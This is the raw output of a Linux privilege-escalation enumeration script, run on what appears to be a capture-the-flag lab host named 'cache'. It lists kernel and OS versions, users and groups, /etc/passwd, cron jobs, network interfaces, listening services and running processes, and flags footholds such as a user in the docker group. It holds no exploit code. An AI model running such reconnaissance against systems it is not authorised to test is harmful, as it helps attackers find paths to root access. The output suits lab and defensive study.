#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Aug 11 07:18:35 UTC 2020                                                                                                                                                                                                               
                                                                                                                                                                                                                                           

### SYSTEM ##############################################
[-] Kernel information:
Linux cache 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-109-generic (buildd@lgw01-amd64-010) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.2 LTS"
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic


[-] Hostname:
cache


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(ash) gid=1000(ash) groups=1000(ash)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Thu Jul  9 09:23:32 +0000 2020
ash              tty1                      Sun Nov 24 15:19:40 +0000 2019
luffy            pts/0    10.10.14.3       Wed May  6 08:54:44 +0000 2020


[-] Who else is logged on:
 07:18:35 up  3:10,  0 users,  load average: 0.06, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(ash) gid=1000(ash) groups=1000(ash)
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
uid=111(memcache) gid=114(memcache) groups=114(memcache)
uid=112(mysql) gid=115(mysql) groups=115(mysql)


[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
ash:x:1000:1000:ash:/home/ash:/bin/bash
luffy:x:1001:1001:,,,:/home/luffy:/bin/bash
memcache:x:111:114:Memcached,,,:/nonexistent:/bin/false
mysql:x:112:115:MySQL Server,,,:/nonexistent:/bin/false


[-] Super user account(s):
root


[-] Accounts that have recently used sudo:
/home/ash/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x  4 root  root  4.0K Sep 17  2019 .
drwxr-xr-x 23 root  root  4.0K Jul  9 09:26 ..
drwxr-xr-x 11 ash   ash   4.0K May  6 08:50 ash
drwxr-x---  5 luffy luffy 4.0K May  6 08:50 luffy


### ENVIRONMENTAL #######################################
[-] Environment information:
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home/ash/Pictures
XDG_SESSION_ID=c4
USER=ash
PWD=/tmp
HOME=/home/ash
LESSHISTFILE=-
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
MAIL=/var/mail/ash
SHELL=/bin/bash
SHLVL=2
LOGNAME=ash
XDG_RUNTIME_DIR=/run/user/1000
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
drwxr-xr-x 2 root root  4096 Jul  9 09:24 /bin
drwxr-xr-x 2 root root  4096 Sep 17  2019 /snap/bin
drwxr-xr-x 2 root root 32768 Jul  9 09:26 /usr/bin
drwxr-xr-x 2 root root  4096 Apr 24  2018 /usr/games
drwxr-xr-x 2 root root  4096 Feb 14  2019 /usr/local/bin
drwxr-xr-x 2 root root  4096 Feb 14  2019 /usr/local/games
drwxr-xr-x 2 root root  4096 Feb 14  2019 /usr/local/sbin
drwxr-xr-x 2 root root  4096 Jul  9 09:25 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0002
u=rwx,g=rwx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Nov 16  2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Nov 16  2019 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rw-r--r--  1 root root  589 Jun 26  2018 mdadm
-rw-r--r--  1 root root  712 Jan 17  2018 php
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rw-r--r--  1 root root  191 Feb 14  2019 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Jul  9 09:25 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rwxr-xr-x  1 root root  539 Jul 16  2019 apache2
-rwxr-xr-x  1 root root  376 Nov 20  2017 apport
-rwxr-xr-x  1 root root 1478 Apr 20  2018 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1176 Nov  2  2017 dpkg
-rwxr-xr-x  1 root root  372 Aug 21  2017 logrotate
-rwxr-xr-x  1 root root 1065 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  539 Jun 26  2018 mdadm
-rwxr-xr-x  1 root root  538 Mar  1  2018 mlocate
-rwxr-xr-x  1 root root  249 Jan 25  2018 passwd
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root 3477 Feb 21  2018 popularity-contest
-rwxr-xr-x  1 root root  246 Mar 21  2018 ubuntu-advantage-tools
-rwxr-xr-x  1 root root  214 Jun 27  2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Feb 14  2019 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Feb 14  2019 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Feb 14  2019 .
drwxr-xr-x 99 root root 4096 Jul  9 09:26 ..
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  211 Jun 27  2018 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Systemd timers:
NEXT                         LEFT        LAST                         PASSED       UNIT                         ACTIVATES
Tue 2020-08-11 07:39:00 UTC  20min left  Tue 2020-08-11 07:09:03 UTC  9min ago     phpsessionclean.timer        phpsessionclean.service
Tue 2020-08-11 15:17:59 UTC  7h left     Tue 2020-08-11 04:08:38 UTC  3h 10min ago apt-daily.timer              apt-daily.service
Tue 2020-08-11 17:47:33 UTC  10h left    Tue 2020-08-11 05:05:00 UTC  2h 13min ago motd-news.timer              motd-news.service
Wed 2020-08-12 04:23:23 UTC  21h left    Tue 2020-08-11 04:23:23 UTC  2h 55min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Wed 2020-08-12 06:24:51 UTC  23h left    Tue 2020-08-11 06:40:51 UTC  37min ago    apt-daily-upgrade.timer      apt-daily-upgrade.service
Mon 2020-08-17 00:00:00 UTC  5 days left Tue 2020-08-11 04:08:38 UTC  3h 10min ago fstrim.timer                 fstrim.service

6 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:89ff:fed5:3ee3  prefixlen 64  scopeid 0x20<link>
        ether 02:42:89:d5:3e:e3  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 726 (726.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.188  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:74a8  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:74a8  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:74:a8  txqueuelen 1000  (Ethernet)
        RX packets 12732  bytes 1786390 (1.7 MB)
        RX errors 0  dropped 372  overruns 0  frame 0
        TX packets 14669  bytes 6072578 (6.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 17538  bytes 1306427 (1.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17538  bytes 1306427 (1.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:30:b0 [ether] on ens160


[-] Nameserver(s):
nameserver 127.0.0.53


[-] Nameserver(s):
Global
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test

Link 3 (docker0)
      Current Scopes: none
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no

Link 2 (ens160)
      Current Scopes: DNS
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no
         DNS Servers: 8.8.8.8
                      8.8.4.4


[-] Default route:
default via 10.10.10.2 dev ens160 proto static 


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.2 225264  9048 ?        Ss   04:08   0:03 /sbin/init maybe-ubiquity
root         2  0.0  0.0      0     0 ?        S    04:08   0:00 [kthreadd]
root         4  0.0  0.0      0     0 ?        I<   04:08   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   04:08   0:00 [mm_percpu_wq]
root         7  0.0  0.0      0     0 ?        S    04:08   0:00 [ksoftirqd/0]
root         8  0.0  0.0      0     0 ?        I    04:08   0:02 [rcu_sched]
root         9  0.0  0.0      0     0 ?        I    04:08   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    04:08   0:00 [migration/0]
root        11  0.0  0.0      0     0 ?        S    04:08   0:00 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    04:08   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    04:08   0:00 [cpuhp/1]
root        14  0.0  0.0      0     0 ?        S    04:08   0:00 [watchdog/1]
root        15  0.0  0.0      0     0 ?        S    04:08   0:00 [migration/1]
root        16  0.0  0.0      0     0 ?        S    04:08   0:00 [ksoftirqd/1]
root        18  0.0  0.0      0     0 ?        I<   04:08   0:00 [kworker/1:0H]
root        19  0.0  0.0      0     0 ?        S    04:08   0:00 [kdevtmpfs]
root        20  0.0  0.0      0     0 ?        I<   04:08   0:00 [netns]
root        21  0.0  0.0      0     0 ?        S    04:08   0:00 [rcu_tasks_kthre]
root        22  0.0  0.0      0     0 ?        S    04:08   0:00 [kauditd]
root        24  0.0  0.0      0     0 ?        S    04:08   0:00 [khungtaskd]
root        25  0.0  0.0      0     0 ?        S    04:08   0:00 [oom_reaper]
root        26  0.0  0.0      0     0 ?        I<   04:08   0:00 [writeback]
root        27  0.0  0.0      0     0 ?        S    04:08   0:00 [kcompactd0]
root        28  0.0  0.0      0     0 ?        SN   04:08   0:00 [ksmd]
root        29  0.0  0.0      0     0 ?        SN   04:08   0:00 [khugepaged]
root        30  0.0  0.0      0     0 ?        I<   04:08   0:00 [crypto]
root        31  0.0  0.0      0     0 ?        I<   04:08   0:00 [kintegrityd]
root        32  0.0  0.0      0     0 ?        I<   04:08   0:00 [kblockd]
root        33  0.0  0.0      0     0 ?        I<   04:08   0:00 [ata_sff]
root        34  0.0  0.0      0     0 ?        I<   04:08   0:00 [md]
root        35  0.0  0.0      0     0 ?        I<   04:08   0:00 [edac-poller]
root        36  0.0  0.0      0     0 ?        I<   04:08   0:00 [devfreq_wq]
root        37  0.0  0.0      0     0 ?        I<   04:08   0:00 [watchdogd]
root        39  0.0  0.0      0     0 ?        I    04:08   0:04 [kworker/1:1]
root        41  0.0  0.0      0     0 ?        S    04:08   0:00 [kswapd0]
root        42  0.0  0.0      0     0 ?        I<   04:08   0:00 [kworker/u5:0]
root        43  0.0  0.0      0     0 ?        S    04:08   0:00 [ecryptfs-kthrea]
root        85  0.0  0.0      0     0 ?        I<   04:08   0:00 [kthrotld]
root        86  0.0  0.0      0     0 ?        I<   04:08   0:00 [acpi_thermal_pm]
root        87  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_0]
root        88  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_0]
root        89  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_1]
root        90  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_1]
root        96  0.0  0.0      0     0 ?        I<   04:08   0:00 [ipv6_addrconf]
root       105  0.0  0.0      0     0 ?        I<   04:08   0:00 [kstrp]
root       122  0.0  0.0      0     0 ?        I<   04:08   0:00 [charger_manager]
root       124  0.0  0.0      0     0 ?        I    04:08   0:01 [kworker/0:2]
root       183  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_2]
root       185  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_2]
root       187  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_3]
root       202  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_3]
root       206  0.0  0.0      0     0 ?        I<   04:08   0:00 [ttm_swap]
root       209  0.0  0.0      0     0 ?        S    04:08   0:00 [irq/16-vmwgfx]
root       210  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_4]
root       211  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_4]
root       216  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_5]
root       218  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_5]
root       221  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_6]
root       222  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_6]
root       223  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_7]
root       224  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_7]
root       225  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_8]
root       226  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_8]
root       227  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_9]
root       228  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_9]
root       229  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_10]
root       230  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_10]
root       231  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_11]
root       232  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_11]
root       233  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_12]
root       234  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_12]
root       235  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_13]
root       236  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_13]
root       237  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_14]
root       238  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_14]
root       239  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_15]
root       240  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_15]
root       241  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_16]
root       242  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_16]
root       243  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_17]
root       244  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_17]
root       245  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_18]
root       246  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_18]
root       247  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_19]
root       248  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_19]
root       249  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_20]
root       250  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_20]
root       251  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_21]
root       252  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_21]
root       253  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_22]
root       254  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_22]
root       255  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_23]
root       256  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_23]
root       257  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_24]
root       258  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_24]
root       259  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_25]
root       260  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_25]
root       261  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_26]
root       262  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_26]
root       263  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_27]
root       264  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_27]
root       265  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_28]
root       266  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_28]
root       267  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_29]
root       268  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_29]
root       269  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_30]
root       270  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_30]
root       271  0.0  0.0      0     0 ?        S    04:08   0:00 [scsi_eh_31]
root       272  0.0  0.0      0     0 ?        I<   04:08   0:00 [scsi_tmf_31]
root       301  0.0  0.0      0     0 ?        I<   04:08   0:00 [kworker/0:1H]
root       303  0.0  0.0      0     0 ?        I<   04:08   0:00 [kworker/1:1H]
root       372  0.0  0.0      0     0 ?        I<   04:08   0:00 [raid5wq]
root       423  0.0  0.0      0     0 ?        S    04:08   0:00 [jbd2/sda2-8]
root       424  0.0  0.0      0     0 ?        I<   04:08   0:00 [ext4-rsv-conver]
root       491  0.1  0.2 200620 11548 ?        Ssl  04:08   0:22 /usr/bin/vmtoolsd
root       493  0.0  0.4 128424 19304 ?        S<s  04:08   0:01 /lib/systemd/systemd-journald
root       496  0.0  0.0      0     0 ?        I<   04:08   0:00 [iscsi_eh]
root       497  0.0  0.0      0     0 ?        I<   04:08   0:00 [ib-comp-wq]
root       498  0.0  0.0      0     0 ?        I<   04:08   0:00 [ib-comp-unb-wq]
root       499  0.0  0.0      0     0 ?        I<   04:08   0:00 [ib_mcast]
root       500  0.0  0.0      0     0 ?        I<   04:08   0:00 [ib_nl_sa_wq]
root       501  0.0  0.0      0     0 ?        I<   04:08   0:00 [rdma_cm]
root       509  0.0  0.0  97708  1712 ?        Ss   04:08   0:00 /sbin/lvmetad -f
root       520  0.0  0.1  46816  5724 ?        Ss   04:08   0:01 /lib/systemd/systemd-udevd
root       555  0.0  0.0      0     0 ?        S<   04:08   0:00 [loop0]
root       557  0.0  0.0      0     0 ?        S<   04:08   0:00 [loop1]
systemd+   647  0.0  0.0 141952  3404 ?        Ssl  04:08   0:00 /lib/systemd/systemd-timesyncd
systemd+   804  0.0  0.1  71872  5204 ?        Ss   04:08   0:00 /lib/systemd/systemd-networkd
systemd+   829  0.0  0.1  70920  6156 ?        Ss   04:08   0:00 /lib/systemd/systemd-resolved
root       914  0.0  0.4 169100 17200 ?        Ssl  04:08   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
daemon     916  0.0  0.0  28332  2460 ?        Ss   04:08   0:00 /usr/sbin/atd -f
memcache   917  0.0  0.1 425792  4164 ?        Ssl  04:08   0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid
root       918  0.0  0.0 457224  2284 ?        Ssl  04:08   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root       922  0.1  1.7 1008020 69496 ?       Ssl  04:08   0:13 /usr/bin/dockerd -H fd://
root       929  0.0  0.2  88228  9724 ?        Ss   04:08   0:00 /usr/bin/VGAuthService
root       958  0.0  0.0 110548  2072 ?        Ssl  04:08   0:00 /usr/sbin/irqbalance --foreground
root       960  0.0  0.0  30028  3164 ?        Ss   04:08   0:00 /usr/sbin/cron -f
message+   961  0.0  0.1  50148  4764 ?        Ss   04:08   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
syslog    1002  0.0  0.1 267276  5112 ?        Ssl  04:08   0:00 /usr/sbin/rsyslogd -n
root      1003  0.0  0.1  70600  5996 ?        Ss   04:08   0:00 /lib/systemd/systemd-logind
root      1005  0.0  0.1 286244  6976 ?        Ssl  04:08   0:00 /usr/lib/accountsservice/accounts-daemon
root      1078  0.0  0.6 784372 27184 ?        Ssl  04:08   0:01 /usr/lib/snapd/snapd
root      1081  0.0  0.9 956812 39232 ?        Ssl  04:08   0:00 /usr/bin/containerd
root      1083  0.0  0.1  72300  5896 ?        Ss   04:08   0:00 /usr/sbin/sshd -D
root      1118  0.0  0.5 185944 20320 ?        Ssl  04:08   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root      1132  0.0  0.0  14888  2044 tty1     Ss+  04:08   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1162  0.0  0.1 288884  6580 ?        Ssl  04:08   0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql     1250  0.1  6.3 1627792 255388 ?      Sl   04:08   0:12 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
root      1321  0.0  1.0 885192 40700 ?        Ssl  04:08   0:10 containerd --config /var/run/docker/containerd/containerd.toml --log-level info
root      1943  0.0  0.5 364400 21220 ?        Ss   04:09   0:00 /usr/sbin/apache2 -k start
www-data  9848  0.0  0.7 372352 29856 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data  9850  0.0  0.7 372708 31896 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data 11896  0.0  0.8 372868 34980 ?        S    06:25   0:01 /usr/sbin/apache2 -k start
www-data 22616  0.0  0.7 372596 30908 ?        S    06:26   0:00 /usr/sbin/apache2 -k start
www-data 22644  0.0  0.6 372656 28228 ?        S    06:27   0:00 /usr/sbin/apache2 -k start
www-data 22645  0.0  0.7 372636 31668 ?        S    06:27   0:00 /usr/sbin/apache2 -k start
www-data 22646  0.0  0.7 372540 29120 ?        S    06:27   0:00 /usr/sbin/apache2 -k start
www-data 22998  0.0  0.7 372432 30116 ?        S    06:40   0:00 /usr/sbin/apache2 -k start
www-data 23188  0.0  0.7 372516 29980 ?        S    06:44   0:00 /usr/sbin/apache2 -k start
